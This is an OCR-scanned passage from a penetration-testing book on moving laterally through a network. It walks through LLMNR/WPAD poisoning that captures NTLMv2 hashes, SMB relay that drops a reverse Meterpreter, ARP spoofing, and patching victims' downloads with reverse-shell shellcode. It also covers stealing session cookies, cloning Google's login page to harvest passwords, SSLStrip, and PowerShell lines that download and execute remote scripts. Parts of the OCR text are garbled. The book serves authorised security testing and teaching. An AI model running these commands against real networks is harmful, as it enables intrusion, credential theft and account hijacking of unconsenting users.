http://thehackerplayb... GET 
http://thehackerplayb... GET 


Proxy Spider Scanner Intruder Repeater Sequencer Decoder 


Scope 


This will compare the two different scans and see how responses differ based on the user account. 
Finding access as a regular user to privileged content, or identifying where responses are similar or 
different, could identify rmsconfigurations within the application. 





































































































































































































Burp - Site Comparison Results 


If you are interested in learning more, you can visit: 
https://www.owasp.org/index.php/Web_Application_Penetration_Testing . 

This is where successful testers spend a majority of their time. Anyone can run scans, but if you are 
an effective and efficient manual tester, you are leagues above the norm. 

Conclusion 

In a network penetration test, time is of the essence. You need to have a solid understanding of the 
underlying infrastructure, application, and possible vulnerabilities. This chapter has provided a high- 
level overview of vulnerabilities, how to identify them, and what type of impact they might have if 
that vulnerability is not resolved. 


Web vulnerabilities will probably be the most common vulnerability you will identify on an external 
penetration test. You should now be able to demonstrate how to take advantage of these issues 
efficiently. 



The Lateral Pass - Moving Through The Network 


At this point, you have compromised some servers and services through the SUCK network, but 
unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t 
seem to move forward. You might be on a network, but without privileges or account credentials, you 
would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your 
ability to move through the network and gain access to domain administrative accounts. However, as 
a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where 
sensitive data is being stored and gain access to those environments. This might require pivoting 
through essential employees and understanding how the corporation segments their data. 


This section will focus on moving through the network and going from a limited user, all the way to 
owning the whole network. We will cover such topics as starting without credentials, proxying 
through hosts, having limited domain credentials, and then having local/domain credentials. 


On The Network Without Credentials: 


Let's say that you are on the network, but you don't have any credentials yet. Maybe you cracked their 
WPAv2 Personal Wi-Fi password or popped a box that wasn't connected to the domain. I might first 
turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other 
passive types attacks. Once I feel like I have an understanding of the local network, I will start 
compromising systems using a variety of attacks specified in the next few sections. 


Responder.py 

f https://github.com/SpiderLabs/RespondeO (Kali Linux) 


One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is 
a tool that listens and responds to LLMNR (Link Local Multicast Name Resolution) and NBT-NS 
(NetBIOS over TCP/IP Name Service). 


Responder also actively takes advantage of the WPAD vulnerability. You can read more about this 
attack in the following Technet article: MS 12-074 - Addressing a vulnerability in WPAD's PAC file 
handling (blogs.technet.com/b/srd/archive/2012/11/13/ms 12-074-addressing-a-vulnerability-in- 
wpad-s-pac-file-handling.aspx). The basics are that when a browser (IE or network LAN settings) is 
set to automatically detect settings, the victim host will try to get the configuration file from the 
network. 



Internet Option*. ' y £3 

General [ Sear C »tent Connections Programs [ Advanced 


♦f ' X S Bing 


P - 


To set *> an Internet connection, defc 
Setup. 

Dial-to and Virtual Private Network settngs 


Choose Setbngiif you need to configure a prory 
server for a connection, 


local Area Network (LAN) settngs 

LAN Settings do not apply to duf-cp connections. 
Choose Settings above for dal-to settngs. 



Automatically Detect Settings 


As the attacker, since we are on the same network as our victim, we can respond to Name 
Resolutions and inject our own PAC file to proxy all web traffic. This way we can force the user to 
authenticate against our SMB servers. You might ask, "Why is this important?" If we can get the 
victim host to authenticate against our SMB servers, we can request their NTLM challenge/response 
hashes without alerting the victim that anything is misconfigured. If the user is already authenticated to 
the domain, they will try to use those cached credentials to authenticate against our servers. 


If you want to see all of the commands for Responder, along with the documentation, visit: 
https://github.com/SpiderLabs/Responder . 

If you have followed the Setup Phase, we should already have Responder installed, so let's dive right 
in. 

In the example below, we start Responder with a few different flags. The "-i" flag is for the IP of your 
host, the "-b" flag is Off for NTLM authentication, and -r is set to Off since leaving it on could break 
things on the network: 

• python ./Responder.py -i [Attacker IP] -b Off -r Off-w On 





















■V ;/Bpt/Resp«nd«r# pjrtnen ,/fiospcndor.py >1 192,163,5,7$ b Off ,r Off w On 

!H0T Nans ServUe/LLW insurer 1.0, 

'Please send bugs/coninenEs Eg: Iqaffieijt-ustwave.can 
M kill this scrLpt lilt CRTL-C 

MlfiMG 6 LLHNfi rsspomdtf started 
'[tilgadlng Responder r conf File,, 

Scidbal Parameters set: 

Challenge set is: 1122334455667788 
»PAD Proxy Server isiON 

WAD script loaded function FlndProxyForURHurl, host) (return 'PfiQJflr lSJU^bnySrv:$141; DIRECT - ;} 

jtfTTP Server is rOlkJ 

[https Server i?:CN 

■SMB Server iS:ON 

■SMB LM support is Set 10 : OFF 

fiOL Server is:0N 

1FTP Server is;0N 

[CNS Server is:0N 

1DAP Server is:DN 

Fingerprint Module is:OFF 

Serving Executable via KHPSIPAD ls:0FF 

Always Servino a Specific File via HTTPSwPip is ; ffF_ 


Responder.py 


Once Responder starts running, you should give it a few minutes to identify requests and send 
malicious responses. Below is this attack in progress. 


LLMNR poisoned answer sent to this IP: 192.1G8.0.2. The requested name was : wpad. 


LL’-INH ; I- 5 & ■ • r or * * v>: 

VTwPiDTITe’sent to: 192.106.0.2 


IF: i -V . 1 ^ . ro -oquo'/roq -i,3 ti.;- ,-.3-:. : .-.pa 3. 


■ IWPAp n\e sent to: 192-1Q8.Q.2 


.LMNR poisoned answer sent to this IP: 
.LMNR poisoned answer sent to this IP: 


192.106.0.2. The requested name was 
192.108.0.2. The requested name was 


♦1HTTP Proxy sent from: 192.108.0.2 The requested URL was: htt D://www.reddlt.com/ 


lsaproxysrv. 

lsaproxysrv. 


![♦)HTTP Cookie Header sent from: 192.108.0.2 The Cookie Is: 

Cookie: utma«44040128.700491492.1781270700.1781276708.178127^700.1; _utmb-44O40128.10. 


t)|utmccn*(dlrect)|utmcmd"(none) 

|LLHNR poisoned answer sent to this IP: 192.108.0.2. The requested name was : ISAProxySrv. 
[+JHTTP Proxy sent from: 192.1G8.G.2 The requested URL was: http://www.reddlt.com/ 

(♦]HTTP Cookie Header sent from: 192.108.0.2 The Cookie is: 

Cookie: _utma*44040128.750491492.17812707OQ.17012707£3.1781270700.1; _utmb-44G40128.10. 

|ct) |utmecn-(dltec t) | utmcmd.(none) 

I+JHTTP Proxy sent from: 192.108.£.2 The requested URL was: http://www.reddlt.com/ 

(♦]HTTP Cookie Header sent from: 192.108.0.2 The Cookie Is: 

Cookie: _utma-44040128.700491492.1781270700.1781276708.1781270700.1; _utmb-44040128.10. 
ct)|utmccn*(direct)|utmcmd«(none) 

MHTTP NTLMv2 hash captured from : 192.108.0.2 
Domain is : fakeOomaln 

User is : cheetz r-y ,,—. n n n nnr 

Hostname Is : CHEETZ-PC 

cheet z::f akeOomaln:1122771144001188:D490700EE070111FB27F980DF797A440: 


Complete hash is 

06 30094 7061000120QQ10010004 70010061200200041001FOO1F601 cq?j I BOO 190b41000100120 01700COOO02' 
2067000700077002E001700OD00020O2E000C006F00070001000C060400120017 )O0O0002002E000C000F0007j 
81111AEC84O890OF0174C00O8027194OAA2A01A410E8704EEE1824210A0010000P0000000000000000000000< 
0180019001700120010000000000000000000 


Responder Results 


Several things happened once Responder.py started running. First, we see that the LLMNR was 
poisoned for 192.168.0.2 and a malicious WPAD file was sent to the victim This means that all of 
their web traffic will now use our attacker machine as a proxy. This also means that anything in clear 
text is visible to us. Secondly, we see that we are tracking the cookies for any website that the user 
visits. If they go to a site over HTTP after authentication, we can now become the victim user as we 
have all their cookies. Finally, and most importantly, we see the NTLM challenge/response hashes 
through our injected attacks. 












We do have a couple of problems with these hashes though. We can't really use these hashes right 
away in any sort of pass-the-hash type, as these are the NTLM challenge/response hashes. What we 
can do with these hashes is utilize John the Ripper or oclHashcat. 


John Example: 

$ cat hashes.txt 

cheetz::FAKEDOMAIN: 1122334455667788:4D8AABB385ADC35D8ABF778E9852BC27:010100( 


$ john —format=netntlmv2 hashes.txt 

Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/32]) 
password (cheetz) 
oclHashcat Example: 

cudaHashcat-plus64.exe -m5600 hashes.txt password_file.txt 


These two password-cracking examples are going to lead into the password-cracking section, but I 
wanted to give you a quick initial taste of how powerful Responder is. 


Sometimes it is not worth trying to crack a password. If you know the victim has a complex password 
policy or there aren't enough users online to get multiple hashes, you might want to try SMB replay 
attacks. Instead of enabling the SMB server in Responder, you can enable Metasploif s smbreplay 
module (use exploit/window s/smb/smb_replay) if the victim allows NTLMvl authentication. This 
now means that any SMB requests will be forwarded to a server of your choice and their challenge 
hashes will be authenticated against that server. Let's say you are able to do this against an IT admin, 
chances are they will have escalated privileges on the servers you identified. 


If you do have to go this route, I would recommend you watch this video by Rob Fuller: 

https://www.youtube.com/watch?v=05W5tUG7z2M . Fuller talks about using ZachAttack to help 
manage all the NTLM sessions and to continually compromise the network. 


However, if the end users or servers are configured in a way that only allows NTLMv2 connections, 
these tools will fail. The only way I have been successful in SMB Replay attacks for NTLMv2 
authentication is by using the Impact framework. You can download a copy here: 
http://code.google.eom/p/impaeket/ 

I originally found the configuration of Impacket from: http://pen-testing.sans.org/blog/pen- 
testin^2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python, which goes over the 
entire setup . I won't dive too much into this since you can visit the SANS site for more details to 
create a Meterpreter executable and run the python script. 




:-/Desk top/i«packet-0-9. lO/smbrelayi:# python sm&relayx.py -h 192. 168 . 0 . 16 
e ./reverse eeterpreter.exe 

Iipfltkfit vQA'10 - Copyright 2002-2013 Core Security Technologies 

[ 1 ) Runnlrtg in relay mode 
[*] Setting up SMB Server 

(*] Servers started, waiting for connections 
(*] Setting up HTTP Server 


smbrelayx.py 


Once you receive an SMB connection, it will replay that SMB against another server and 
drop/execute the reverse Meterpreter binary We will talk later about creating reverse shells in the 
Evading AV section. 


ARP (address resolution protocol) Poisoning 


Generally, ARP is used as either a last resort or for a very specific test. There are times when I will 
do one, but be aware that there is generally a good chance that you will affect end users and possibly 
cause disruptions on the network. So make sure you have a great grasp on ARP Spoofing before 
performing them on an engagement. 


For those that haven’t had too much experience with ARP Poisoning, let’s review what it does. ARP 
Poisoning is a common Man in the Middle (MITM) attack that takes advantage of the insecure nature 
of ARP, specifically the transition from OSI layer 2 (MAC address) to OSI layer 3 (IP address). 
Basically, in a simple scenario, there is a network with a router (ROUTE A), a legitimate host 
(HOSTA), and an attacker (HOSTB). To poison these hosts, the attacker sends an unsolicited ARP 
reply to the ROUTE A with the IP address of HOST A, but with their own HOST B MAC address. 
Then, the attacker sends an unsolicited ARP reply to HOST A with the IP address of ROUTE A, but 
again with their own HOST B MAC address. At this point, the router now thinks the attacker’s MAC 
address belongs to HOST A, and HOST A thinks the attacker’s MAC address belongs to 
ROUTE A. Ultimately, this will route all of HOST A’s traffic through HOST B before going to the 
router, bidirectionally. This could lead to manipulation of traffic, sniffing for 
passwords/cookies/kerberos keys, and more. If you want to see why ARP spoofing works, you can 
read more about it from: 

http://www.irongeek.com/i.php?page=security/arpspoof . 


Cain and Abel 

f h ttp://www.oxid. i t/cai n.html ) (Windows) 







Download: http://www.oxid.it/cain.html 
Operating System: Windows 


Let's see how we can ARP spoof our victim using Cain and Abel. To successfully ARP spoof in Cain, 
click on the sniffer button at the top-left, then click the sniffer tab and select the Scan MAC Address 
button. 



^ m St H? 

+ y 


B 4 *]HiK9gaQ<3 a 


£ Decoders | j Network Suffer | g/ Cracker | Tracer oute |lEH CCDU |*y* Wireless 


IP address 


MAC adless | OUI fingerprint 
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Remove All 

Clear Promiscuous-Mode Results 
Export 


-g} Hosts (g> APR [*~ out rig | Passwords [ ^ VoIP 


Cain and Abel Scanning MAC Addresses 


Next, drop into the ARP tab at the bottom of Cain, select ARP on the left column, and click the "Plus" 
sign at the top bar (one thing to note is that the + button might not be visible. Try to click in the middle 
pane to enable that button). 
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APR List 


This should bring up the IPs from the previous scan and allow you to select the host to ARP Spoof 
and the gateway IP. 
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APR Poison Routing 


Lastly, click on the APR Poisoning start/stop button located at the top menu bar and you are all set. 
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192.166.10.163 
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106 161 188.224 
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192.166.10.163 

C68CC609200A 
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Successful Poisoning 


Now that we have a full MITM ARP Poisoning, we can go look for clear text passwords. You can do 
this by going to the Passwords tab at the bottom of the screen and selecting HTTP or any other clear 
text protocol. 


Passwords 

Timestamp 

HTTP server 

Client 

Userna 

FTP (0) 


19/10/2013- 12:36:22 

98.138.253.109 

192.168.10.163 

cH8ucll 

3 HTTP (3) 


19/10/2013- 12:36:23 

98.138.252.30 

192.168.10.163 

IEEE 



19/10/2013- 12:36:28 

98.137.170.32 

192.168.10.163 

d48udl 


109 LDAP (0) 


< 



$ 

HTTP 

^ Hosts | (g) APR | Routr* 

"| A Passwords 

& VoIP 


HTTP Clear Text 


There are many different attacks which can be performed with a full ARP spoof. I will show you a 
couple more examples in this chapter, but I will leave it up to you to figure out what is most 
appropriate for your test. 


Ettercap 

( http://ettercap. github.io/ettercap/ i (Kali Linux) 

Download: http: //ettercap .github. io/ettercap/ 
Operating System: Kali Linux 


If you favor Linux for providing your ARP spoofing attacks, the old school way is to do this using 
Ettercap. The basic ARP spoof command is: 










































• ettercap-TqM arp: remote /10.0.1.1//10.0.1.7/ 


This command will perform an ARP spoof against 10.0.1.7 and the gateway 10.0.1.1 using the text 
interface (T) in quiet mode (q) and perform a MITM (M). This means that all of the traffic from 
10.0.1.7 will flow from your computer to the gateway and you will see all of the victim user's traffic. 
If you want to see the traffic natively, you can sniff using tcpdump or Wireshark. 


:-# ettercap -TqM arp:remote /10.0.1.1/ /10.0.1.7/ 

ettercap 0.7.6 copyright 2001-2013 Ettercap Development Team 

Cannot change tcp-segmentation-offload 
Cannot change large-receive-offload 
Could not change any device features 
Listening on: 
eth0 -> 00:0C:29:93:36:F8 

172.16.139.185/255.255.255.0 
fe80::20c:29ff:fe93:36f8/64 

SSL dissection needs a valid ’redir_command_on' script in the ett 
Privileges dropped to UID 65534 GID 65534... 

31 plugins 

43 protocol dissectors 
59 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2183 Known services 

Scanning for merged targets (2 hosts)... 

♦ |==================================================>| 100,00 % 


Ettercap 


Note that there are a lot of different plugins with ettercap and it is very beneficial to understand what 
they do. Once you are within an ettercap MITM attack, you can press the letter "P" to see all of the 
different modules you can load. By pressing "P", you should see the following. 


Example of available plugins: 


[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 

[ 0 ] 


arpcop 1.1 
autoadd 1.2 
chk_poison 1.1 
dnsspoof 1.1 
finger 1.6 


Report suspicious ARP activity 
Automatically add new victims in the target range 
Check if the poisoning had success 
Sends spoofed dns replies 
Fingerprint a remote host 


fingersubmit 1.0 
remotebrowser 1.2 
search_promisc 1.2 
smbclear 1.0 
smbdown 1.0 
smurf attack 1.0 


Submit a fingerprint to ettercap's website 
Sends visited URLs to the browser 
Search promise NICs in the LAN 
Tries to force SMB cleartext auth 
Tries to force SMB to not use NTLM2 key auth 
Run a smurf attack against specified hosts 





[0] sslstrip 1.1 SSLStrip plugin 

[0] stpmangler 1.0 Become root of a switches spanning tree 

My favorite attack to perform is the dnsspoof. This allows you to control where your victim goes on 
the Internet. For example, if they go to Gmail, you can redirect the DNS request to point to a web 
server you own and capture the credentials. 

If you want to see this attack in action against software updates, visit my blog post at 

https://www.securepla.net/dont-upgrade-your-software/ where I discuss how to use this in 
combination with Evilgrade to take advantage of poor update implementation processes. But why stop 
there? 


Backdoor Factory Proxy 

I https://github.com/sccrctsquirrcl/BDFProxy ) tKali Linux) 


BDFProxy f https ://github.com/sccrctsquirrcl/BDFProxv i is a tool that patches executables with user 
shellcode and allows the executable to perform normally. BDF will write shellcode into empty 
spaces and call hooks to that code. The best part is that it works automatically on Windows, OS X, 
and Linux. So as long as we can redirect a victim’s traffic through our host, we can manipulate the 
executable before the user receives it. 


• First, we need to modify the config file to include the address of our attacking 
machine: 

o gedit/etc/bdfproxy/bdfproxy.cfg 


(j * bdfproxy. cfg X ' 

CompressedFiles = True #True/Fal.se 
[{[Linuxlntelx86]]] 

SHELL = reverseshelTtcp # This is the BDF syntax 


IHOST = 192.168.222.130 


PORT = 8888 

SUPPLIED_SHELLCODE = None 

MSFPAYLOAD = Tinux/x86/shell_reverse_tcp # MSF 

syntax 

BDF Configuration File 


• Run BDFProxy: 

o bdfproxy 

• BDFProxy will create a metasploit resource file. In a new terminal window, input: 

o msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc 

• We also need to configure our firewall to forward all http traffic through the 
mitmproxy: 

o sysctl -w net.ipv4.ip_forward=l 

o iptables -t nat -A PREROUTING -i ethO -p tcp —dport 80 -j 
REDIRECT —to-port 8080 

• Lastly, we need to configure the victim host to route through our machine using 








arpspoofmg (you can find this by arp -a): 

o arpspoof -i ethO -t <victim ip> <gateway ip> 
o arpspoof -i ethO -t <gateway ip> <victim ip> 
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======== response ======== 

] HOST: 94,23.42,1^ 

■] PATH: /themes/default/async/greet ings. pfip 
1 labile Size; 1 KB 
j Hot a tar file 
=!==::== FfjD RESPONSE 


::====:== RESPONSE ========== 

] HOST; 188 , 165 . 209.151 
I PilH: /rar/winrat'X64'521.txe 
1 In the backdoor module 
] Checking if binary is supported 

i Gathering (lie info 
] Reading win64 entry Instructions 
] Looking for and sitting selected shellcode 
) Creating win64 resume execution stub 
j Creating Code Cave 

Adding a new section to the e*e/dll for shellcode injection 
] Patching initial entry instruction? 

1 Creating win54 resume execution stub 

] Leaking for and setting selected shellcode 
j Overwriting certificate table pointer 
1 Patching complete, forwarding to user, > 
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BDF Patching Binary Executables 





































After the file is patched and downloaded, the unknowing victim executes the file. This will spawn off 
either a Meterpreter Shell or just a normal shell based on the type and configuration. In the example 
below, a victim downloaded a normal WinRAR installer and since it did not do any integrity 
checking, we were able to successfully patch the executable. Once executed, the file opens up a shell 
on our Metasploit listener. 


‘j Started reverse handler on 192,166.1,120:5555 
*! Starting the payload handler.., 

exploit ( mi i r ) Command shell session 1 opened 

DSf exploittli, mdl t) > sessions -1 

Active sessions 


Id Type 


Information 


l shell windows Microsoft Windows [Version 6>1* *7631] 
>3371 (192*160*1 ,110] 

nsf exploit (handle ;) > sessions -11 

Active sessions 



PKTAiton 

CifregrfflFteMtaftAR 


This h ei [rial version ol Wink 

test period of 40 days 

PLEASE CAREFULLY READ T 
BEFORE CONTINUING THE I 

END USER LICENSE AGREED 

The following agreement regard?i 
archr.tr ■ referred to as 'scftwan 
to as “licensor - and anyone wt 


Id Type 


Info mat ion 


nil exploit (hindl r) > sessions *i I 
m \ Starting interaction with 1... 

Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2099 Microsoft Corporation 

::\Users\cheetz\Downloads> 

1 




to the B€ USES: LICENSE ft 
syce. [>t«e dd: [Caned], 


1 shell windows Microsoft Windows [Version 6.1.7601] ■ 
>3371 {192,168,1,110) 


hs’uij 


i ch-eetz i Downloads i 
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ttinraK^I-521 [lie** 


4 Favorites 
■ Desktop 


BDF Shells 


Steps After Arp Spoofing: 

























If you successfully ARP-spoofed your victim, you pretty much control where the victim goes, what 
they see, what protocols they might use, and see any passwords that might be passed in clear. Let's 
see some examples which take advantage of these attacks. 


Side Jacking: 

From a high-level view, sidejacking is the process of sniffing the traffic, looking for session tokens 
(cookies), and using those tokens to authenticate as the user. Remember that HTTP is a stateless 
protocol. That means it has to use other methods to track your session without a username/password 
authentication for every page on a web application. After you authenticate the first time, a session 
token will be generated for the whole session and now the token is essentially your authentication 
pass. If that session cookie is compromised, an attacker can take those session tokens, import them 
into their own browser and become you. If you are still unfamiliar with sidejacking, you can visit this 
link for more information: 

http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.hftTil . 


Hamster/Ferret (Kali Linux) 

Hamster is a tool that allows for these sidejacking attacks. It acts as a proxy server which replaces 
your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions. 
Cookies are sniffed using the Ferret program. 


How to run Hamster/Ferret: 

• First, we enable IP forwarding: 

o echo "1" >/proc/sys/net/ipv4/ip_forward 

• We then modify IP tables for SSL Strip: 

o iptables -t nat -A PREROUTING -p top -destination-port 80 -j 
REDIRECT-to-port 1000 

• Next, we configure and run SSL Strip: 

o sslstrip -f -a -k -1 1000 -w /root/out.txt & 

• Next, we need to enable ARP spoof (remember this will ARP spoof everyone on the 
network): 

o arpspoof -i ethO [gateway] 

• Next, we need to enable Ferret. In a new terminal window: 

o ferret -i ethO 

• And finally enable Hamster. In a new terminal window: 

o hamster 


Now, you just need to wait for a victim to go to a website, authenticate or be authenticated, and for 
their cookies to be sniffed. Once you feel you have obtained their cookies, look at the hamster.txt file 
that was created. In the case below, we see that the victim's Reddit cookies were stolen, and these are 
the session tokens that show up in the right-side of the image below. 
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Hamster Results 






With the Reddit session tokens, let's see how we can use them to gain access as that user. I copy the 
redditsession value information and add that into my browser by using a cookie that mimics the 
cookie we stole. I then refresh the page. 


We will use the Firefox Web Developer Add-on which we installed during the setup to analyze and 
add our cookies. We can drop down in the Cookies Menu and click Add Cookie. As you can see 
prior to adding the cookie, I am currently not logged in as any user. After adding a reddit session 
cookie and adding the proper values, I click OK. 
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Replacing Cookies 


Refreshing the page, it looks like we were able to gain access to this account (image below) without 
ever knowing the password! Remember that I am in no way attacking Reddit's site or servers at all. 
The only thing I am doing is sniffing the clear-text traffic, pulling out the cookies, and replacing my 
cookies with those that were sniffed on a network I own. 
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Becoming the Victim User 


Fire sheep 

I won't talk much about Firesheep since it is an older tool and similar to the example above; however, 

I just want to point out that the concept still exists today. You can read a little more about it here: 
http://codebutler.com/firesheep/. Firesheep is an add-on tool to Firefox which sniffs the wireless or 
wired networks for session tokens passed in clear. In your browser window, it presents a framed 
page where you can click on a user you captured and become that user instantly. You don't have to 
add any of your own cookies manually, but it only works for a limited number of sites. 


The originating problem is that when session cookies do not have the Secure Flag set and protocol is 
not over HTTPS, then there is a possibility that the cookies will be passed in clear. How do you 
check if your cookies are secure? I will first log into my own website and then take a look at my 
cookies. I amusing the web-developer add-on for Firefox to do this. 
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Cookie Informatbr 
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1 Security Awareness 


Cookies- 


Collapse all Expand all 


Name 

sec1135808350179_mw_sesswn 

Value 

7db3def9c23c7l113def9c23c77dbb7ce 

Host 

www.securepla.net 

Path 

/ 


Expires 

At end of session 

Secure 

No 


HttpOnly 

Yes 



Cookie Information and Secure Cookie 


In the image above, the mwsession token, which is used to keep state for the user, is passed with the 
secure flag off. If the application at any time references information on that page over HTTP or if an 
attacker can force the victim to visit www.securepla.net over HTTP, the attacker will have the full 
session token and be able to take advantage of the user's access. 

DNS Redirection: 

If I have a successful MITM within a corporation, one attack that is usually fruitful is to clone the 
intranet page (or any page that requires authentication), then use it for DNS redirection. This is an 
easy way to get usernames and passwords. Let's see a quick example: 

We already know how to configure Cain and Abel to MITM systems in a network from a prior 
example. We will assume you already have a victim routing through you. The next step is to modify 
and spoof DNS requests that happen through the MITM. 


Under the Sniffer top tab and APR bottom tab, click on APR-DNS. Here you can right-click and add 
DNS requests that you want to modify As mentioned before, I will usually pick an intranet page 
requiring authentication, but in this case, I will spoof Google and their authentication. 
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Cain and Abel APR-DNS 


The second thing to do is set up a fake page to grab credentials. To clone the site, I generally use the 
Social Engineering Tool (SET) kit (I will go through a more detailed example later on in the Social 
Engineering Section). Once running within the SET Menu, go to: 1 - Social Engineering Attacks, 2 - 
Website Attack Vectors, 3 - Credential Harvester Attack Method, 2 - Site Cloner. 

In this case, I am going to clone https://accounts.google.com/ServiceLogin, which is the universal 
login page for Google, Gmail, Google+, etc. This is configured on a Kali box that has an IP of 
192.168.0.85. 


2) Site Cloner 

3) Custom Import 

99) Return to Webattack Menu 

;et:v.T &attacK >2 

•1 Credential harvester will allow you to utilize the clone capabilities within SET 
-| to harvest credentials or parameters from a website as well as place them into a report 
-j This option is used for what IP the server will POST to. 

-I If you're using an external IP, use your external IP for this 
T .: > IP address for the POST back in Harvester/Tabnabbing: 192.168.9.85 

-1 SET supports both HTTP and HTTPS 

-I Example: http://www.thlslsafakeslt e.com __ 

:t > Enter the url to clone fottps://accounts.google.ccm/ServlceLogln ] 

•) Cloning the website: https://accounts.google.com/ServlceLogln E/7/T\ n [~l I I I 11 \ 
•j This could take a little bit... 



92.168.0.90 • - I30/NOV/2O13 19:49:55] "GET / HTTP/1.1" 200 - 
92.168.0.90 • • [30/NOV/2013 19:52:17) "PET / HTTP/I.l" 200 - 


Cloning Google's Authentication Page 


We have now configured our DNS spoof and set up a fake page. When the ARP-Spoofed victim 
decides to go to google.com, they will be redirected to our SET-cloned webpage. Any usernames and 
passwords will be printed to our screen and users will then be redirected to the real Google page to 
make it look like the user typed the wrong password. 
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PARAM: rmShown*! 




Spoofed Google Authentication Page and Victim's Passwords 


SSLStrip: 

SSL strip is a tool developed by Moxie Marlinspike that redirects a user from an HTTPS page to an 
HTTP site, so that all traffic can be sniffed in clear text. I would first watch Moxie's talk at Blackhat 
f https://www.youtube.com/watch?v=MFol6IMbZ7Y L The tool monitors HTTPS traffic and rewrites 
all HTTPS communication to HTTP (clear text) from the user. 


Commands on Kali: 

• echo "1" >/proc/sys/net/ipv4/ip_forward 

• iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT —to- 
port 8080 

• sslstrip -1 8080 

• ettercap -TqM arp: remote/192.168.0.12//192.168.0.1/ 


In this case, we are spoofing the requests from 192.168.0.12 and the gateway at 192.168.0.1. 








-# echo "1" > /proc/sys/net/lpv4/lp_for»ard 

-» lptables -t nat -A PREfiOUTING -p tcp --destination-port 80 -) PtOIRCCT --to-port 0080 
-# sslstrlp -l 0000 


:slstrlp 0.9 by Moxie Marllnsplke running... 



root^kaii: • 

Fil« Edit Vitw SMfch Ttrmtritl M«lp 


ettercap -TqM arpireeote /192.168.0.1/ /192.168.0.12/ 

ettercap 0.7.6 copyright 2601-2013 Ettercap Developeent Teae 

Carnot change tcp-segaentatlon-offload 

Carnot change large-receive-offload 

Could not change any device features 

Listening on: 
eth0 •> 60:0C:29:93:36:F8 

192.168.0.91/255.255.255.0 
fe80::20c:29f f:fe93:36f8/64 


SSL Strip 


When your victim (192.168.0.12) goes to facebook.com, it will not redirect to the HTTPS version of 
Facebook for the authentication. In the example below, the user goes to Facebook and types their 
username and password. If we go back to the ettercap terminal, we will see the username and 
password scroll through. 



Victim Visiting Facebook.com and Redirected to HTTP and Captured Passwords 


For IPv6 attacks look at parasite6 in the THC-IPv6 toolkit: 
f https://www.thc.org/thc-ipv6/ T 


With Any Domain Credentials (Non-Admin): 
Initial System Recon 


So you have compromised your first couple of systems on the SUCK network. The question I get 
asked the most is: What’s next? What do I need to do to get more information about the 
system/network and eventually get to the domain admin? You might be on a Window’s host and might 














use these few standard queries to get an idea of the environment. 


Windows Enumeration: 

At this point we should know the basic commands like ipconfig, netstat, whoami, etc. to find the basic 
system information. I have compiled most of the basic ones in a single Windows command line: 

• whoami / all && ipconfig / all && netstat -ano && net accounts && net local group 
administrators && net share 


But usually for a penetration tester, this isn’t enough. Before we escalate privileges, we need to 
understand our end system and network much better. 

By now, you know that PowerShell is extremely powerful in a Windows environment, especially for 
a penetration tester. The following commands are strictly PowerShell scripts that are enabled by 
default on all Windows 7 OS’es and higher. 


• Check Window Patches 

o Most client machines in a network generally have similar patch 
levels. Therefore, compromising a single host will give you an idea of 
what other machines will look like. This is where you can start 
targeting attacks for applications, browsers, etc. 
o powershell.exe -command Get-HotFix 

• Display All AD Users and Associated Information 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-NetUser 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-UserProperties -Properties name,memberof,description,info 
o wmic useraccount get /ALL /format:csv 

• Enable Remote Desktop (requires administrative privileges) 

o set-ItemProperty -Path 

'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name 
"fDenyTSConnections" -Value 0 

• Enable Firewall for Remote Desktop 

o Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

• Add a firewall rule 

o powershell.exe -command New-NetFirewallRule -DisplayName 
“Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol 
TCP -Action Allow 

o powershell.exe -command New-NetFirewallRule -DisplayName 
"Block Outbound Port 80" -Direction Outbound -LocalPort 80 - 
Protocol TCP -Action Block 



• View all services 

o powershell.exe -command Get-Service 

• Restart service 

o powershell.exe -command Restart-Service 

• Configure the DNS server 

o powershell.exe -command Get-Service Set- 
DNSClientServerAddress -InterfaceAlias "Ethernet" 

Server Addresses 8.8.8.8 

• Get a Process Listing 

o powershell.exe -command Get-Process 

o wmic process get caption,executablepath,commandline /format: csv 

• Get a list of all computers from Active Directory 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-NetComputers 

• Collection of information from the system, registries, and other information 

o Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Information.psl'); Get-Information 


Logged in users: 

C:\Uindows\system32\config\systemprof ile 
C:\Windows\ServiceProfilesNLocalService 
C: S W in do ws \S e r u ic e Pr o f i le s \Ne t wo r kS e ru ic e 
C:\Users\cheetz 

Powershe11 enuironnent: 

Install 

PID 

Putty trusted hosts: 
dss022:securepla.net 
rsa20443:internet-scan.com 
rsa2022:192.168.222.129 
rs a2 02 2:t he hac he rplaybo ok.com 
rsa2022:lethalsecurity.com 

Putty saued sessions: 


Recently used commands: 
pbrush\l 
bcadgfe 
cmdSl 
NOTEPflDVL 
W192.168.1.2 
W192.168.1.2 
notepad++\l 
calc\l 

Shares on the machine: 


• Search the network for which computers the Domain Admins are using: 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 



Invoke-Userhunter 

• Find out which computer a specific AD user is on. In this example, we will look for 
